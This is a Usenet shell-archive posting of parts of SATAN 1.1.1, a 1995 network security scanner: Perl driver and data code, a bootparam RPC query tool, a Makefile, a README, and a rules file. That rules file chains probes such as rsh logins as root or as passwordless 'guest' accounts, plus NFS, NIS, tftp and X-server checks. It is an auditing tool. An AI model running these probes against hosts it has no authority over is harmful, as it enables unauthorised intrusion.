echo shar: Will not clobber existing file \"'satan-1.1.1/perl/run-satan.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/run-satan.pl'\" $1401 characters$
sed "s/^X//" >'satan-1.1.1/perl/run-satan.pl' <<'END_OF_FILE'
Xrequire 'perl/satan-data.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perl/getfqdn.pl';
Xrequire 'perl/get_host.pl';
Xrequire 'perl/suser.pl';
X
Xsub run_satan {
X local($primaries) = @_;
X local($target);
X
X #
X # Don't die silently when tools cannot be run with sufficient privilege.
X #
X die "SATAN needs root privileges for data collection.\n" if $>;
X
X #
X # Clear the table with alive hosts.
X #
X %host_is_alive = ();
X
X #
X # Set up a list of primary target hosts.
X #
X die "no primary target was specified" if $primaries eq "";
X for $primary_target (split(/\s+/, $primaries)) {
X #
X # Jump hoops to get at the official host name in case foo.com is
X # in reality called bar.foo.com.
X #
X if ($primary_target =~ /^[a-zA-Z]+.*|^\d+\.\d+\.\d+\.\d+$/) {
X $primary_target = $target
X if ($target = &getfqdn(&get_host_name(
X &get_host_addr($primary_target))));
X }
X
X # schedule probe assignments...
X &add_primary_target($primary_target, 0);
X }
X #
X # In case we must do something special with primary target hosts.
X #
X &fix_primary_targets();
X
X #
X # Switch control between the data collection engine and the
X # inference engine until both run out of new ideas. Checkpoint
X # after each iteration.
X #
X while(sizeof(*new_targets)||sizeof(*new_todos)||sizeof(*new_facts)) {
X &process_targets();
X &process_todos();
X &process_facts();
X &save_satan_data();
X }
X &update_status("SATAN run completed");
X}
X
X1;
END_OF_FILE
if test 1401 -ne `wc -c <'satan-1.1.1/perl/run-satan.pl'`; then
echo shar: \"'satan-1.1.1/perl/run-satan.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/run-satan.pl'
fi
if test -f 'satan-1.1.1/perl/satan-data.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/satan-data.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/satan-data.pl'\" $2333 characters$
sed "s/^X//" >'satan-1.1.1/perl/satan-data.pl' <<'END_OF_FILE'
X#
X# SATAN data management routines.
X#
Xrequire 'perl/targets.pl';
Xrequire 'perl/todo.pl';
Xrequire 'perl/facts.pl';
X
X#
X# Reset and point path names to new or existing data directory.
X#
Xsub init_satan_data {
X local($directory);
X
X &clear_satan_data();
X &find_satan_data();
X}
X
X#
X# Point path names to new or existing data directory.
X#
Xsub find_satan_data {
X if ($satan_data =~ /\// ) {
X $directory = $satan_data;
X } else {
X (-d "results") || mkdir("results",0700)
X || die "results: invalid directory: $!\n";
X $directory = "results/$satan_data";
X }
X (-d "$directory") || mkdir("$directory",0700)
X || die "$satan_data: invalid directory: $!\n";
X
X $todo_file = "$directory/todo";
X $facts_file = "$directory/facts";
X $all_hosts_file = "$directory/all-hosts";
X}
X
X#
X# Erase all in-core satan data structures.
X#
Xsub clear_satan_data {
X &clear_all_hosts();
X &clear_facts();
X &clear_todos();
X}
X
X#
X# Forget non-inference stuff we know about these hosts. We must save/reload
X# the tables later, or memory will be polluted with stale inferences.
X#
Xsub drop_satan_data {
X local($hosts) = @_;
X local($host);
X
X for $host (split(/\s+/, $hosts)) {
X &drop_all_hosts($host);
X &drop_old_todos($host);
X &drop_old_facts($host);
X }
X}
X
X#
X# Read satan data from file. Existing in-core data is lost.
X#
Xsub read_satan_data {
X
X &clear_satan_data();
X
X print "Reading $satan_data files...\n" if (-s $facts_file && $debug);
X
X &read_all_hosts($all_hosts_file) if -f $all_hosts_file;
X &read_facts($facts_file) if -f $facts_file;
X &read_todos($todo_file) if -f $todo_file;
X
X print "Done reading $satan_data files\n" if (-s $facts_file && $debug);
X}
X
X#
X# Save satan data to file. Order may matter, in case we crash.
X#
Xsub save_satan_data {
X &save_facts("$facts_file.new");
X rename("$facts_file.new", $facts_file)
X || die "rename $facts_file.new -> $facts_file: $!\n";
X
X &save_todos("$todo_file.new");
X rename("$todo_file.new", $todo_file)
X || die "rename $todo_file.new -> $todo_file: $!\n";
X
X &save_all_hosts("$all_hosts_file.new");
X rename("$all_hosts_file.new", $all_hosts_file)
X || die "rename $all_hosts_file.new -> $all_hosts_file: $!\n";
X}
X
X#
X# Merge data with in-core tables.
X#
Xsub merge_satan_data {
X &merge_all_hosts($all_hosts_file) if -f $all_hosts_file;
X &merge_facts($facts_file) if -f $facts_file;
X &merge_todos($todo_file) if -f $todo_file;
X}
END_OF_FILE
if test 2333 -ne `wc -c <'satan-1.1.1/perl/satan-data.pl'`; then
echo shar: \"'satan-1.1.1/perl/satan-data.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/satan-data.pl'
fi
if test -f 'satan-1.1.1/perl/severities.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/severities.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/severities.pl'\" $2717 characters$
sed "s/^X//" >'satan-1.1.1/perl/severities.pl' <<'END_OF_FILE'
X#
X# update_severities - classify vulnerabilities.
X#
X# type is taken from the $service_info field; level is taken from the
X# $severity field.

X#
X# Output to:
X#

X# $severity_type_host_info{type}{host}: all SATAN records on that topic.
X#
X# $severity_type_count{type}: number of hosts with this severity.
X#
X# $severity_host_type_info{host}{type}: all SATAN records on that topic.
X#
X# $severity_host_count{host}: number of vulnerabilities per host.
X#
X# $severity_levels{severity}: host names per severity level.
X#
X# $severity_flag: reset whenever the tables are updated. To recalculate,
X# invoke make_severity_info().
X#
X# Standalone usage: perl severities.pl [satan_record_files...]
X#
X
Xsub update_severities {
X if ($trusted =~ /\bANY\b/) {
X $type = "other vulnerabilities" if ($type = $service_output) eq "";
X if (index($severity_host_type_info{$target}{$type}, $_) < $[) {
X $severity_host_type_info{$target}{$type} .= $_ . "\n";
X $severity_type_host_info{$type}{$target} .= $_ . "\n";
X $severity_levels{$severity}{$target} .= $_ . "\n";
X $severity_host_count{$target}++;
X $severity_flag = 0;

X }
X }
X}
X
X#

X# Generate severities-dependent statistics.
X#
Xsub make_severity_info {
X local($severity, $host, %junk);
X
X if ($severity_flag > 0) {
X return;
X }
X $severity_flag = time();
X
X print "Rebuild severity type statistics...\n" if $debug;
X
X for $severity (keys %severity_type_host_info) {
X %junk = %{$severity_type_host_info{$severity}};
X $severity_type_count{$severity} = sizeof(*junk);
X }
X}
X
X#
X# Reset all severity information
X#
Xsub clear_severity_info {
X %severity_host_type_info = ();
X %severity_type_host_info = ();
X %severity_levels = ();
X %severity_host_count = ();
X %severity_type_count = ();
X $severity_flag = 0;

X}
X
X#
X# Some scaffolding for stand-alone operation
X#

Xif ($running_under_satan == 0) {

X $running_under_satan = -1;
X $debug = 1;

X require 'perl/misc.pl';
X warn "severities.pl running in stand-alone mode";
X
X #
X # Sort severity information and do some counting.
X #

X while (<>) {
X chop;
X if (&satan_split($_) == 0) {

X &update_severities($_);
X }
X }
X &make_severity_info();
X
X print "Hosts grouped by severity\n";
X for $severity (sort keys %severity_type_host_info) {
X print "$severity ($severity_type_count{$severity})\n";
X for (sort keys %{$severity_type_host_info{$severity}}) {
X print "\t$_\n";
X }
X }
X
X print "Severities grouped by host\n";
X for $host (sort keys %severity_host_type_info) {
X print "$host\n";
X for $type (sort keys %{$severity_host_type_info{$host}}) {
X for (split(/\n/, $severity_host_type_info{$host}{$type})) {
X print "\t$_\n";

X }
X }
X }
X}
X

X# UPC Code:
X
X1;
END_OF_FILE
if test 2717 -ne `wc -c <'satan-1.1.1/perl/severities.pl'`; then
echo shar: \"'satan-1.1.1/perl/severities.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/severities.pl'
fi
if test -f 'satan-1.1.1/rules/todo' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/todo'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/todo'\" $2706 characters$
sed "s/^X//" >'satan-1.1.1/rules/todo' <<'END_OF_FILE'
X#
X# Rules that specify what probes to try next. Each rule is applied once
X# to every 'a' SATAN record. Format of this file is:
X#
X# condition TABs target tool tool-arguments

X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#

X# The condition is a PERL expression, with full access to the global

X# $target..$text variables and to everything else that has been found out
X# sofar. The target is the host that the tool is aimed at. A "*" before
X# the tool argument list is a hack that specifies that tool arguments
X# should be ignored when looking for duplicate tool invocations.
X#
X# When the condition is satisfied, the tool is executed as:
X#
X# tool tool-arguments target
X#
X# The $junk variable is available for temporary results (wow!).
X#
X# The software keeps track of already executed tool invocations.
X#
X# version 2, Mon Mar 27 20:42:15 1995, last mod by wietse
X#
X
X#
X# Output from the rpcinfo probe. Tools will be executed only when
X# permitted by attack level constraints.
X#
X$service eq "mountd" $target "showmount.satan"
X$service eq "mountd" $target "nfs-chk.satan" "-t $short_timeout"
X$service eq "ypserv" $target "ypbind.satan"
X$service eq "rexd" $target "rex.satan"
X$service eq "rusersd" $target "rusers.satan"
X
X#
X# Output from the finger or rusers probe: finger the origin of the login.
X#
X$severity eq "l" && "$trustee|$trusted" =~ /(.*)@.*@(.*)/ \
X $2 "finger.satan" "-u $1"
X#
X# Output from the port scanners. Tools will be executed only when
X# permitted by the attack level constraints.
X#
X$service eq "ftp" $target "ftp.satan"
X$untrusted_host && $service eq "shell" $target "rsh.satan"
X$untrusted_host && $service eq "shell" $target "rsh.satan" "-u root"
X$service eq "tftp" $target "tftp.satan"
X$service =~ /X-([0-9]+)/ $target "xhost.satan" "-d $target:$1"
X
X#
X# Output from showmount. The "*" at the beginning of the tool argument
X# list is a hack that specifies that tool arguments should be ignored
X# when looking for duplicate tool invocations.
X#
X$trustee =~ /\/export\/root\/(.*)@(.*)/ && ($junk = &fix_hostname($1,$2)) ne ""\
X $target "boot.satan" $junk
X
X#
X# Output from the bootparam probe gives us the NIS domain name. With
X# ypwhich we can ask the host who its NIS server is.
X#
X$service eq "boot" && $service_output =~ /domain (\S+)/ \
X $target "ypbind.satan" "-d $1"
X$service eq "boot" && $service_output =~ /domain (\S+)/ \
X $target "yp-chk.satan" "$1"
X#
X# Example of site specific rule; SGI's, for instance, have a "guest", "lp",
X# and other account with no password when out-of-the-box from SGI. Here's
X# how you could check for this:
X$untrusted_host && /IRIX/ $target "rsh.satan" "-u guest"
END_OF_FILE
if test 2706 -ne `wc -c <'satan-1.1.1/rules/todo'`; then
echo shar: \"'satan-1.1.1/rules/todo'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/todo'
fi
if test -f 'satan-1.1.1/satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/satan'\"
else
echo shar: Extracting \"'satan-1.1.1/satan'\" $2981 characters$
sed "s/^X//" >'satan-1.1.1/satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 3, Tue Apr 4 8:58:13 1995, last mod by wietse
X#
X
X$running_under_satan = 1;
X
Xrequire 'config/version.pl';
Xrequire 'config/satan.cf';
Xrequire 'perl/satan-data.pl';
Xrequire 'perl/run-satan.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl'; # IRIX needs it at the end.
X
X#
X# Defaults are taken from the config file. There are three ways to control
X# operation: from the command line, from the satan.cf file, and from the
X# HTML user interface. That's a bit much.
X#
X$opt_a = $attack_level;
X$opt_A = $proximity_descent;
X$opt_d = $satan_data;
X$opt_l = $max_proximity_level;
X$opt_o = $only_attack_these;
X$opt_O = $dont_attack_these;
X$opt_s = $attack_proximate_subnets;
X$opt_S = $status_file;
X$opt_t = 1;
X$opt_u = $untrusted_host;
X$opt_v = 0;
X$opt_z = $sub_zero_proximity;
X
X#
X# Parse JCL.
X#
X$usage = "usage: $0 [options] [targets...]
X
XEnters interactive mode when no target host is specified.
X
X-a attack level (0=light, 1=normal, 2=heavy, default $opt_a)
X-A proximity descent (default $opt_A)
X-c list change variables (list format: \"name=value; name=value; ...\")
X-d database data directory (default $opt_d)
X-i ignore existing results
X-l proximity maximal proximity level (default $opt_l)
X-o list scan only these (default '$opt_o')
X-O list stay away from these (default '$opt_O')
X-s expand primary hosts to subnets
X-S status_file pathname with scanning status file (default $opt_S)
X-t level timeout (0 = short, 1 = medium, 2 = long, default $opt_t)
X-u running from an untrusted host (for rsh/nfs tests)
X-U running from a trusted host (for rsh/nfs tests)
X-v turn on debugging output
X-V print version number
X-z when attack level becomes negative, continue at level 0
X-Z stop at attack level 0
X";
X
X&Getopts("a:A:c:d:e:il:o:O:sS:t:uUvVzZ") || die $usage;
X
Xif ($opt_V) {
X print "SATAN version $satan_version\n";
X exit 0;
X}
X
X# The power of PERL never stops to amaze me - Wietse
Xfor (split(/\s*;\s*/, $opt_c)) {
X ${$name} = $value if ($name, $value) = split(/\s*=\s*/, $_, 2);
X}
X
Xprint "SATAN is starting up....\n" if $#ARGV < 0;
X
X$debug = $opt_v;
X
X@all_attacks = (\@light, \@normal, \@heavy);
Xdie "bad attack level: $opt_a\n" unless $all_attacks[$opt_a];
X$attack_level = $opt_a;
X
X$satan_data = $opt_d;
X
X$max_proximity_level = $opt_l;
X$proximity_descent = $opt_A;
X$sub_zero_proximity = $opt_z;
X$sub_zero_proximity = 0 if $opt_Z;
X
X$only_attack_these = $opt_o;
X$dont_attack_these = $opt_O;
X
X$attack_proximate_subnets = $opt_s;
X$status_file = $opt_S;
X
X@all_timeouts = ($short_timeout, $med_timeout, $long_timeout);
Xdie "bad timeout: $opt_t\n" unless $all_timeouts[$opt_t];
X$timeout = $all_timeouts[$opt_t];
X
X$untrusted_host = $opt_u;
X$untrusted_host = 0 if $opt_U;
X
Xumask 077; # DON'T TAKE THIS OUT!!!
X
Xif ($#ARGV < 0) {
X #
X # The HTML driver will eventually invoke init_satan() and run_satan().
X #
X require 'perl/html.pl';
X &html();
X} else {

X &init_satan_data();
X &read_satan_data() unless defined($opt_i);

X &run_satan(join(' ', @ARGV));
X}
X
END_OF_FILE
if test 2981 -ne `wc -c <'satan-1.1.1/satan'`; then
echo shar: \"'satan-1.1.1/satan'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/satan'
fi
if test -f 'satan-1.1.1/src/boot/boot.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/boot/boot.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/boot/boot.c'\" $2439 characters$
sed "s/^X//" >'satan-1.1.1/src/boot/boot.c' <<'END_OF_FILE'
X /*
X * Usage: boot bootclient bootserver
X *
X * Executes a bootparam WHOAMI request and print the results.

X */
X
X#include <stdio.h>

X#include <sys/types.h>
X#include <sys/socket.h>
X#include <netdb.h>
X#include <rpc/rpc.h>
X#include "bootparam_prot.h"

X
Xmain(argc, argv)
Xint argc;

Xchar *argv[];
X{
X int stat;
X char host[256];
X struct hostent *hp;
X static struct bp_whoami_arg bp_arg;
X static struct bp_whoami_res bp_res;
X char *domain;
X char *strchr();
X char *clnt_sperrno();
X char *me = argv[0];
X char *client = argv[1];
X char *server = argv[2];
X long addr;
X
X if (argc != 3) {
X fprintf(stderr, "Usage: %s bootclient bootserver\n", me);
X exit(1);
X }
X /* Find out the bootserver's official host name. */
X if ((hp = gethostbyname(server)) == NULL) {
X fprintf(stderr, "Host %s not found.\n", server);
X exit(1);
X }
X /* If bootclient name isn't in FQDN form, append domain from server. */
X if (strchr(client, '.') == 0 && (domain = strchr(hp->h_name, '.')) != 0) {
X sprintf(host, "%s%s", client, domain);
X client = host;
X }
X /* Find out the bootclient's address. Assume it has only one. */
X if ((hp = gethostbyname(client)) != NULL) {
X memcpy((caddr_t) & bp_arg.client_address.bp_address_u.ip_addr,
X hp->h_addr_list[0], hp->h_length);
X } else if ((addr = inet_addr(client)) != -1) {
X memcpy((caddr_t) & bp_arg.client_address.bp_address_u.ip_addr,
X &addr, sizeof(addr));
X } else {
X fprintf(stderr, "Host %s not found.\n", client);
X return (1);
X }
X bp_arg.client_address.address_type = IP_ADDR_TYPE;
X bp_res.client_name = 0; /* allocate buffer */
X bp_res.domain_name = 0; /* allocate buffer */
X
X if (stat = callrpc(server,
X BOOTPARAMPROG, BOOTPARAMVERS,
X BOOTPARAMPROC_WHOAMI,
X xdr_bp_whoami_arg, &bp_arg,
X xdr_bp_whoami_res, &bp_res)) {
X fprintf(stderr,
X "me: cannot contact bootparam server at %s for %s: %s\n",
X server, client, clnt_sperrno(stat));
X return (1);
X }
X printf("client_name: %s\n", bp_res.client_name);
X printf("domain_name: %s\n", bp_res.domain_name);
X printf("router_addr: %d.%d.%d.%d\n",
X (bp_res.router_address.bp_address_u.ip_addr.net & 0377),
X (bp_res.router_address.bp_address_u.ip_addr.host & 0377),
X (bp_res.router_address.bp_address_u.ip_addr.lh & 0377),
X (bp_res.router_address.bp_address_u.ip_addr.impno & 0377));

X return (0);
X}
END_OF_FILE

if test 2439 -ne `wc -c <'satan-1.1.1/src/boot/boot.c'`; then
echo shar: \"'satan-1.1.1/src/boot/boot.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/boot/boot.c'
fi
if test -f 'satan-1.1.1/src/port_scan/error.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/error.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/error.c'\" $2287 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/error.c' <<'END_OF_FILE'
X /*
X * remark, error, panic - diagnostics handlers
X *
X * Feature: %m is expanded to the system errno text.

X *
X * Author: Wietse Venema.
X */
X

X#include <stdio.h>
X#include <errno.h>
X
X#ifdef __STDC__
X#include <stdarg.h>
X#define VARARGS(func,type,arg) func(type arg, ...)
X#define VASTART(ap,type,name) va_start(ap,name)
X#define VAEND(ap) va_end(ap)
X#else
X#include <varargs.h>
X#define VARARGS(func,type,arg) func(va_alist) va_dcl
X#define VASTART(ap,type,name) {type name; va_start(ap); name = va_arg(ap, type)
X#define VAEND(ap) va_end(ap);}
X#endif
X
Xchar *progname = "unknown";
X
Xextern int errno;
Xextern char *strerror();
Xextern char *strcpy();
X
X#include "lib.h"
X
X/* percentm - replace %m by error message associated with value in err */
X
Xchar *percentm(buf, str, err)
Xchar *buf;
Xchar *str;
Xint err;
X{
X char *ip = str;
X char *op = buf;
X
X while (*ip) {
X switch (*ip) {
X case '%':
X switch (ip[1]) {
X case '\0': /* don't fall off end */
X *op++ = *ip++;
X break;
X case 'm': /* replace %m */
X strcpy(op, strerror(err));
X op += strlen(op);
X ip += 2;
X break;
X default: /* leave %<any> alone */
X *op++ = *ip++, *op++ = *ip++;
X break;
X }
X default:
X *op++ = *ip++;
X }
X }
X *op = 0;

X return (buf);
X}
X

X/* error - print warning on stderr and terminate */
X
Xvoid VARARGS(error, char *, fmt)
X{
X va_list ap;
X int err = errno;

X char buf[BUFSIZ];
X

X VASTART(ap, char *, fmt);

X fprintf(stderr, "%s: ", progname);

X vfprintf(stderr, percentm(buf, fmt, err), ap);
X fprintf(stderr, "\n");
X VAEND(ap);
X exit(1);
X}
X
X/* remark - print warning on stderr and continue */
X
Xvoid VARARGS(remark, char *, fmt)
X{
X va_list ap;
X int err = errno;

X char buf[BUFSIZ];
X

X VASTART(ap, char *, fmt);

X fprintf(stderr, "%s: ", progname);

X vfprintf(stderr, percentm(buf, fmt, err), ap);
X fprintf(stderr, "\n");
X VAEND(ap);
X}
X
X/* panic - print warning on stderr and dump core */
X
Xvoid VARARGS(panic, char *, fmt)
X{
X va_list ap;
X int err = errno;

X char buf[BUFSIZ];
X

X VASTART(ap, char *, fmt);

X fprintf(stderr, "%s: ", progname);

X vfprintf(stderr, percentm(buf, fmt, err), ap);
X fprintf(stderr, "\n");
X VAEND(ap);
X abort();
X}
END_OF_FILE
if test 2287 -ne `wc -c <'satan-1.1.1/src/port_scan/error.c'`; then
echo shar: \"'satan-1.1.1/src/port_scan/error.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/error.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_util.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_util.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_util.h'\" $2617 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_util.h' <<'END_OF_FILE'
X/* @(#)rpc_util.h 2.1 88/08/01 4.0 RPCSRC */

X/* @(#)rpc_util.h 1.6 87/06/24 (C) 1987 SMI */
X
X/*
X * rpc_util.h, Useful definitions for the RPC protocol compiler

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */

X#define alloc(size) malloc((unsigned)(size))
X#define ALLOC(object) (object *) malloc(sizeof(object))
X
X#define s_print (void) sprintf
X#define f_print (void) fprintf
X
Xstruct list {
X char *val;
X struct list *next;
X};
Xtypedef struct list list;
X
X/*
X * Global variables
X */
X#define MAXLINESIZE 1024
Xextern char curline[MAXLINESIZE];
Xextern char *where;
Xextern int linenum;
X
Xextern char *infilename;
Xextern FILE *fout;
Xextern FILE *fin;
X
Xextern list *defined;
X
X/*
X * rpc_util routines
X */
Xvoid storeval();
X
X#define STOREVAL(list,item) \
X storeval(list,(char *)item)
X
Xchar *findval();
X
X#define FINDVAL(list,item,finder) \
X findval(list, (char *) item, finder)
X
Xchar *fixtype();
Xchar *stringfix();
Xvoid pvname();
Xvoid ptype();
Xint isvectordef();
Xint streq();
Xvoid error();
Xvoid expected1();
Xvoid expected2();
Xvoid expected3();
Xvoid tabify();
Xvoid record_open();
X
X/*
X * rpc_cout routines
X */
Xvoid cprint();
Xvoid emit();
X
X/*
X * rpc_hout routines
X */
Xvoid print_datadef();
X
X/*
X * rpc_svcout routines
X */
Xvoid write_most();
Xvoid write_register();
Xvoid write_rest();
Xvoid write_programs();
X
X/*
X * rpc_clntout routines
X */
Xvoid write_stubs();
END_OF_FILE
if test 2617 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_util.h'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_util.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_util.h'
fi
echo shar: End of archive 11 $of 15$.
cp /dev/null ark11isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 136
Archive-name: satan/part12

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/Makefile satan-1.1.1/README
# satan-1.1.1/bin/finger.satan satan-1.1.1/bin/rpc.satan
# satan-1.1.1/bin/ypbind.satan satan-1.1.1/config/services
# satan-1.1.1/html/docs/references.html
# satan-1.1.1/html/reporting/satan_info_OS.pl
# satan-1.1.1/html/reporting/satan_info_class.pl
# satan-1.1.1/html/reporting/satan_info_trusting.pl
# satan-1.1.1/html/running/satan_run_action.pl
# satan-1.1.1/html/running/satan_run_form.pl
# satan-1.1.1/html/tutorials/first_time/scanning.html
# satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html
# satan-1.1.1/html/tutorials/vulnerability/Sendmail_vulnerabilities.html
# satan-1.1.1/html/tutorials/vulnerability/remote_shell_access.html
# satan-1.1.1/html/tutorials/vulnerability/unrestricted_NFS_export.html
# satan-1.1.1/html/tutorials/vulnerability/unrestricted_X_server_access.html
# satan-1.1.1/perl/fix_hostname.pl satan-1.1.1/perl/policy-engine.pl
# satan-1.1.1/perl/subnets.pl satan-1.1.1/src/fping/README
# satan-1.1.1/src/rpcgen/rpc_scan.h
# Wrapped by kent@ftp on Wed Apr 12 20:30:10 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 12 (of 15)."'
if test -f 'satan-1.1.1/Makefile' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/Makefile'\"
else
echo shar: Extracting \"'satan-1.1.1/Makefile'\" $2208 characters$
sed "s/^X//" >'satan-1.1.1/Makefile' <<'END_OF_FILE'
XSHELL = /bin/sh
XMAKE = make
XRPCGEN = rpcgen
X#LIBS = -lsocket -lnsl
X
Xwhat:
X @echo "Usage: make system-type. Known types are:"
X @echo "aix osf bsd bsdi dgux irix4 irix5 freebsd hpux9 linux sunos4 sunos5 sysv4"
X @exit 1;
X
Xaix osf bsd hpux9 sunos4:
X @$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=int"
X
Xultrix4:
X @$(MAKE) rpcgen all LIBS= XFLAGS="-DAUTH_GID_T=int" \
X RPCGEN="../../bin/rpcgen"
X
Xbsdi:
X @$(MAKE) all LIBS="-lrpc" XFLAGS="-DAUTH_GID_T=int"
X
Xfreebsd:
X @$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=int -DSYS_ERRLIST_DECLARED"
X
Xlinux:
X @echo The LINUX rules are untested and may be wrong
X @set +e; test -f include/netinet/ip.h || {\
X echo Please copy the 44BSD /usr/include/netinet include files; \
X echo files to `pwd`/include/netinet and try again.;\
X exit 1; \
X }
X @$(MAKE) all LIBS= XFLAGS="-I`pwd`/include -DAUTH_GID_T=int"
X
Xirix4:
X @$(MAKE) all LIBS="-lXm_s -lXt_s -lX11_s -lPW -lc_s -lsun" \
X XFLAGS="-DAUTH_GID_T=int"
X
Xirix5:
X @$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=gid_t"
X
Xdgux:
X @$(MAKE) all LIBS="-lnsl" XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC"
X
Xsunos5:
X @$(MAKE) all LIBS="-lsocket -lnsl" XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC"
X
Xsysv4:
X @$(MAKE) rpcgen all LIBS="-lsocket -lnsl" \
X XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC" \
X RPCGEN="../../bin/rpcgen"
X
Xrpcgen:
X cd src/rpcgen; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)"
X
Xall:
X cd src/misc; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)"
X cd src/boot; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)"
X cd src/port_scan; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)"
X cd src/nfs-chk; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)"
X cd src/yp-chk; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)"
X cd src/fping; $(MAKE) "LIBS=$(LIBS)" "CFLAGS=$(XFLAGS)"
X
Xchecksums:
X @find * -type f -print | sort | xargs md5
X
Xclean:
X cd src/misc; $(MAKE) clean
X cd src/boot; $(MAKE) clean
X cd src/port_scan; $(MAKE) clean
X cd src/nfs-chk; $(MAKE) clean
X cd src/yp-chk; $(MAKE) clean
X cd src/fping; $(MAKE) clean
X cd src/rpcgen; $(MAKE) clean
X rm -f html/satan.html html/satan_documentation.html status_file \
X bit_bucket
X
Xtidy: clean
X rm -f *.old *.bak *.orig */*.old */*.bak */*.orig tmp_file*
X rm -rf results
X chmod -x satan
END_OF_FILE
if test 2208 -ne `wc -c <'satan-1.1.1/Makefile'`; then
echo shar: \"'satan-1.1.1/Makefile'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/Makefile'
# end of 'satan-1.1.1/Makefile'
fi
if test -f 'satan-1.1.1/README' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/README'\"
else
echo shar: Extracting \"'satan-1.1.1/README'\" $2279 characters$
sed "s/^X//" >'satan-1.1.1/README' <<'END_OF_FILE'
X
XIn order get things up and running,
X
X- You need a UNIX system to run SATAN. In order to unpack the SATAN
X archive,
X
X compress -d <satan-X.X.tar.Z | tar xvf -
X
X- You will need PERL 5.000 or better (perl5 alpha is NOT good enough),
X and a WWW browser (Netscape, Mosaic, or Lynx). SATAN looks a lot
X better on a color display. The FAQ gives hints for MONO screens.
X
X- When you collect or view data about hundreds of hosts you will need a
X machine with enough CPU power (sparc5, indy, or better) and memory
X (32 MB or better).
X
X- Run the "reconfig" script. It will patch some scripts with the
X pathnames of your PERL 5 executable, and of your WWW browser. If
X SATAN does not find the WWW browser that you want to use, edit the
X config/paths.pl file and change the line
X
X $MOSAIC="program_name";
X
X to whatever browser you prefer (make sure to preserve the quotation
X marks and punctuation of the line.)
X
X- Run the "make" command. It will ask you to specify a system type.
X Most mainstream system types are provided.
X
X- When your network lies behind a firewall, you should unset your proxy
X environment variables (such as $http_proxy $file_proxy, $socks_ns,
X etc.) and/or change your browser configuration to not use your SOCKS
X host or HTTP Proxy (see your HTML browser's option section.)
X
X- Run the "satan" script. When run without arguments, it will start up
X a WWW browser. The command-line interface is described in the satan.8
X manual page ("nroff -man" format). You must run SATAN as superuser if
X you want to collect data.
X
X- You can run multiple SATAN processes in parallel to speed up data
X collection, but each process should be given its own database (via
X the "-d" command-line option). We use one SATAN database per block of
X 256 addresses (satan -d x.x.x x.x.x). After data collection you can
X merge SATAN databases in core with the HTML browser (see the
X documentation on scanning and databases for more on this.) Parallel
X code and sharing of databases will come at a later date.
X
X- Use your browser's PRINT button to print reports.
X
XMost documentation is accessible via your WWW browser.
X
XLast but not least, SATAN was written to improve Internet security.
XDon't put our work to shame.
X
X Wietse Venema / Dan Farmer
X (sa...@fish.com)
X
